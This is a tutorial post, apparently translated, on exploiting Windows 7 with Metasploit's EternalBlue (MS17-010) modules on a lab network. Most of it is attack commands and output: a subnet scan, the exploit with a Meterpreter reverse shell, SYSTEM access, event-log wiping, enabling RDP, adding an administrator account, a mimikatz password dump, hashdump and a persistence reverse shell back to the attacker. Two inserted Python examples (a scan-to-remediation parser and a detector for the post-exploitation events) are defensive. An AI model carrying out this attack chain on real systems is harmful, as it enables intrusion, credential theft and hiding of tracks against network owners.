The EternalBlue vulnerability

Posted by Zss:

Test environment: the target machine is Windows 7 x64.


Scanning the whole network for machines that may have the MS17-010 vulnerability

Use search ms17 to find the path of the module we need.

msf5 > search ms17

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank     Check  Description
   -   ----                                                   ---------------  ----     -----  -----------
   0   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
   1   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration
   2   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration
   3   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS
   4   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS
   5   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   6   auxiliary/scanner/smb/smb_ms17_010                                      normal   Yes    MS17-010 SMB RCE Detection
   7   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882
   8   exploit/windows/smb/doublepulsar_rce                   2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   9   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   10  exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   11  exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

The auxiliary modules are the scanners and the exploit modules are the attack modules; for the scan, start with auxiliary/scanner/smb/smb_ms17_010.

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) >

Use show options to see which options the current module needs set.

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) >

Scan the current subnet for systems that may have the MS17-010 vulnerability.

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.11.0/24
rhosts => 192.168.11.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 30
threads => 30
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.11.11:445     - Host is likely VULNERABLE to MS17-010! - Windows 8.1 Pro 9600 x64 (64-bit)
[-] 192.168.11.21:445     - Host does NOT appear vulnerable.
[-] 192.168.11.22:445     - Host does NOT appear vulnerable.
[*] 192.168.11.0/24:445   - Scanned  26 of 256 hosts (10% complete)
[*] 192.168.11.0/24:445   - Scanned  59 of 256 hosts (23% complete)
[*] 192.168.11.0/24:445   - Scanned  80 of 256 hosts (31% complete)
[*] 192.168.11.0/24:445   - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.11.0/24:445   - Scanned 142 of 256 hosts (55% complete)
[+] 192.168.11.157:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.11.0/24:445   - Scanned 167 of 256 hosts (65% complete)
[*] 192.168.11.0/24:445   - Scanned 183 of 256 hosts (71% complete)
[*] 192.168.11.0/24:445   - Scanned 213 of 256 hosts (83% complete)
[*] 192.168.11.0/24:445   - Scanned 232 of 256 hosts (90% complete)
[*] 192.168.11.0/24:445   - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >
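From the defender's side the interesting output of this scan is the list of hosts to remediate. As an added example (not from the original post and not Metasploit code), the following Python parses text in the scanner's output format and turns the likely-vulnerable hosts into a remediation list. The sample text is constructed to match the run above; the minimum-build table encodes the fact that the MS17-010 update shipped only for Windows 7 SP1 (build 7601), so a build 7600 host such as the target here cannot simply be patched and has to be upgraded.

```python
import re

# Constructed sample in the format printed by auxiliary/scanner/smb/smb_ms17_010
# (same shape as the scan above; the addresses are the ones from the post).
SAMPLE_SCAN_OUTPUT = """\
[+] 192.168.11.11:445     - Host is likely VULNERABLE to MS17-010! - Windows 8.1 Pro 9600 x64 (64-bit)
[-] 192.168.11.21:445     - Host does NOT appear vulnerable.
[-] 192.168.11.22:445     - Host does NOT appear vulnerable.
[*] 192.168.11.0/24:445   - Scanned  26 of 256 hosts (10% complete)
[+] 192.168.11.157:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] Auxiliary module execution completed
"""

IP = r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
VULN_RE = re.compile(
    rf"^\[\+\]\s+{IP}:(?P<port>\d+)\s+-\s+Host is likely VULNERABLE to MS17-010!\s+-\s+(?P<os>.+?)\s*$"
)
SAFE_RE = re.compile(rf"^\[-\]\s+{IP}:\d+\s+-\s+Host does NOT appear vulnerable\.")
# "Windows 7 Enterprise 7600 x64 (64-bit)" -> product "Windows 7 Enterprise", build 7600
OS_RE = re.compile(r"^(?P<product>.+?)\s+(?P<build>\d{4,5})\b")

# Lowest build on which the MS17-010 update can be installed. Windows 7 RTM
# (7600) never received it: the fix was released for SP1 (7601) only.
MIN_PATCHABLE_BUILD = {"Windows 7": 7601, "Windows 8.1": 9600}


def parse_scan(text):
    """Return (vulnerable, not_vulnerable): a dict ip -> OS string, and a set of IPs."""
    vulnerable, not_vulnerable = {}, set()
    for line in text.splitlines():
        m = VULN_RE.match(line)
        if m:
            vulnerable[m.group("ip")] = m.group("os")
            continue
        m = SAFE_RE.match(line)
        if m:
            not_vulnerable.add(m.group("ip"))
    return vulnerable, not_vulnerable


def triage(ip, os_string):
    """Classify one likely-vulnerable host into a remediation action."""
    m = OS_RE.match(os_string)
    if not m:
        return {"ip": ip, "os": os_string, "action": "verify-manually"}
    product, build = m.group("product"), int(m.group("build"))
    family = next((f for f in MIN_PATCHABLE_BUILD if product.startswith(f)), None)
    if family and build < MIN_PATCHABLE_BUILD[family]:
        action = "upgrade-os"      # no MS17-010 update exists for this build
    else:
        action = "apply-ms17-010"  # patch (and disable SMBv1) on this host
    return {"ip": ip, "os": os_string, "build": build, "action": action}


def remediation_report(text):
    """Parse a scan and return triage rows sorted by action, then by IP."""
    vulnerable, _ = parse_scan(text)
    rows = [triage(ip, os_string) for ip, os_string in vulnerable.items()]
    return sorted(rows, key=lambda r: (r["action"], r["ip"]))


if __name__ == "__main__":
    for row in remediation_report(SAMPLE_SCAN_OUTPUT):
        print(f'{row["ip"]:16} {row["action"]:16} {row["os"]}')
```

Hosts reported as "does NOT appear vulnerable" are returned separately rather than discarded, because the scanner only checks the SMBv1 transaction response; a host that is patched but still has SMBv1 enabled belongs on a second list for protocol hardening.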

Host .157 is reported as likely vulnerable, so switch to the exploit module exploit/windows/smb/ms17_010_eternalblue.

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >

Set rhosts to the target address, lhost to the local (attacking) machine's address, and set the payload.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.11.157
rhosts => 192.168.11.157
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.11.218
lhost => 192.168.11.218
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

When the attack succeeds, a Meterpreter session is opened:

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.11.218:4444 
[+] 192.168.11.157:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7600 x64 (64-bit)
[*] 192.168.11.157:445 - Connecting to target for exploitation.
[+] 192.168.11.157:445 - Connection established for exploitation.
[+] 192.168.11.157:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.11.157:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.11.157:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70  Windows 7 Enterp
[*] 192.168.11.157:445 - 0x00000010  72 69 73 65 20 37 36 30 30                       rise 7600       
[+] 192.168.11.157:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.11.157:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.11.157:445 - Sending all but last fragment of exploit packet
[*] 192.168.11.157:445 - Starting non-paged pool grooming
[+] 192.168.11.157:445 - Sending SMBv2 buffers
[+] 192.168.11.157:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.11.157:445 - Sending final SMBv2 buffers.
[*] 192.168.11.157:445 - Sending last fragment of exploit packet!
[*] 192.168.11.157:445 - Receiving response from exploit packet
[+] 192.168.11.157:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.11.157:445 - Sending egg to corrupted connection.
[*] 192.168.11.157:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 192.168.11.157
[*] Meterpreter session 1 opened (192.168.11.218:4444 -> 192.168.11.157:49210) at 2019-12-20 12:30:04 +0800
[+] 192.168.11.157:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.11.157:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.11.157:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >


At this point the attack has succeeded, and commands can be entered to gather information from and control the target.

sysinfo retrieves system information; shell opens a command prompt on the target directly.

meterpreter > sysinfo 
Computer        : WIN-APJBA6K988N
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Meterpreter     : x64/windows
meterpreter > shell
Process 2460 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>

getuid shows the user the session is running as.

meterpreter >  getuid
Server username: NT AUTHORITY\SYSTEM

Meterpreter features

screenshot takes a screenshot of the target's desktop.

meterpreter > screenshot
Screenshot saved to: /root/jeiVIcFC.jpeg

Start a webcam video stream with webcam_stream.

Clearing the event logs

meterpreter > clearev
[*] Wiping 394 records from Application...
[*] Wiping 1145 records from System...
[*] Wiping 350 records from Security...

Enabling Remote Desktop and turning off the firewall

meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]    RDP is already enabled
[*] Setting Terminal Services service startup mode
[*]    The Terminal Services service is not set to auto, changing it to auto ...
[*]    Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191220123443_default_192.168.11.157_host.windows.cle_203314.txt
meterpreter >

From the shell you can also create a user, add it to the administrators group, and enable Remote Desktop:

shell
net user hack 123456 /add
net localgroup administrators hack /add
Enable Remote Desktop:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
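The three post-exploitation steps just shown (clearing the logs with clearev, enabling RDP through fDenyTSConnections, and creating a local administrator with net user / net localgroup) each leave Windows events that survive on the host or at a log forwarder: the clear itself writes Security event 1102 and System event 104, the registry write is Sysmon event 13, and the account work is Security 4720 (account created) and 4732 (member added to a local group, here Administrators, SID S-1-5-32-544). As an added example, not part of the original post, the following Python correlates those events per host over constructed sample records; the flat field names (ts, host, channel, event_id, target_object, ...) are my own assumption of what a log shipper would emit, not a real schema.

```python
from datetime import datetime, timedelta

# Constructed sample events (flattened Security / System / Sysmon records).
# The host name is the one from the post; the timestamps follow the session above.
SAMPLE_EVENTS = [
    {"ts": "2019-12-20T12:31:02", "host": "WIN-APJBA6K988N", "channel": "Security",
     "event_id": 1102, "user": "WIN-APJBA6K988N$"},                      # Security log cleared
    {"ts": "2019-12-20T12:31:03", "host": "WIN-APJBA6K988N", "channel": "System",
     "event_id": 104, "provider": "Microsoft-Windows-Eventlog"},         # System/Application log cleared
    {"ts": "2019-12-20T12:34:43", "host": "WIN-APJBA6K988N",
     "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13,
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},                                    # RDP enabled
    {"ts": "2019-12-20T12:36:10", "host": "WIN-APJBA6K988N", "channel": "Security",
     "event_id": 4720, "target_user": "hack"},                            # local account created
    {"ts": "2019-12-20T12:36:11", "host": "WIN-APJBA6K988N", "channel": "Security",
     "event_id": 4732, "group_sid": "S-1-5-32-544", "member": "hack"},   # added to Administrators
    # Benign noise on another host: enabling RDP by itself is not a finding.
    {"ts": "2019-12-20T09:00:00", "host": "PC-BENIGN",
     "channel": "Microsoft-Windows-Sysmon/Operational", "event_id": 13,
     "target_object": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
]


def rule_log_cleared(e):
    if e["channel"] == "Security" and e["event_id"] == 1102:
        return "security-log-cleared"
    if e["channel"] == "System" and e["event_id"] == 104:
        return "event-log-cleared"
    return None


def rule_rdp_enabled(e):
    target = e.get("target_object", "").lower()
    if (e["event_id"] == 13 and target.endswith(r"\terminal server\fdenytsconnections")
            and e.get("details") == "DWORD (0x00000000)"):
        return "rdp-enabled-via-registry"
    return None


def rule_local_admin_created(e):
    if e["channel"] != "Security":
        return None
    if e["event_id"] == 4720:
        return "local-account-created"
    if e["event_id"] == 4732 and e.get("group_sid") == "S-1-5-32-544":
        return "added-to-administrators"
    return None


RULES = [rule_log_cleared, rule_rdp_enabled, rule_local_admin_created]


def tag_events(events):
    """Apply every rule to every event; return (timestamp, host, tag) for each hit."""
    tagged = []
    for e in events:
        for rule in RULES:
            tag = rule(e)
            if tag:
                tagged.append((datetime.fromisoformat(e["ts"]), e["host"], tag))
    return tagged


def correlate(events, window=timedelta(minutes=15), min_distinct=2):
    """Per host, any window with at least min_distinct distinct tags is a finding.

    Returns {host: set_of_tags}. A single tag (e.g. one RDP enablement) is
    deliberately not enough, so routine admin work does not page anyone.
    """
    by_host = {}
    for ts, host, tag in sorted(tag_events(events)):
        by_host.setdefault(host, []).append((ts, tag))
    findings = {}
    for host, items in by_host.items():
        for i, (start, _) in enumerate(items):
            in_window = {tag for ts, tag in items[i:] if ts - start <= window}
            if len(in_window) >= min_distinct:
                findings[host] = findings.get(host, set()) | in_window
    return findings


if __name__ == "__main__":
    for host, tags in correlate(SAMPLE_EVENTS).items():
        print(host, sorted(tags))
```

clearev cannot remove the 1102 and 104 records, because Windows writes them into the freshly emptied logs after the clear, and records already shipped to a collector are untouched; that is why the correlation treats the log clear as one signal among several rather than relying on any one event surviving.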

Viewing passwords with mimikatz

meterpreter > load mimikatz
[-] The 'mimikatz' extension has already been loaded.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID   Package    Domain           User              Password
------   -------    ------           ----              --------
0;997    Negotiate  NT AUTHORITY     LOCAL SERVICE     
0;996    Negotiate  WORKGROUP        WIN-APJBA6K988N$  
0;47731  NTLM                                          
0;999    NTLM       WORKGROUP        WIN-APJBA6K988N$  
0;86447  NTLM       WIN-APJBA6K988N  Administrator     12345678

Adding a reverse-shell persistence script

run persistence -U -A -i 10 -p 8090 -r kaliip

Dumping account password hashes

run post/windows/gather/hashdump

Remote Desktop from Kali

rdesktop 192.168.11.157

Reference: https://www.anquanke.com/post/id/86245